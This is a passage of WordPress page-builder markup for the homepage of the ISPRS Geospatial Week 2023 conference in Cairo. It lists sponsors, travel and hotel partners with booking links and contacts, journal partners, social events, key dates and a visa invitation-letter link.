css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\n<p>&nbsp;</p>\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a></p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\n<h3 style=\"text-align: center;\"></h3>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Bronze Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145894928{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button 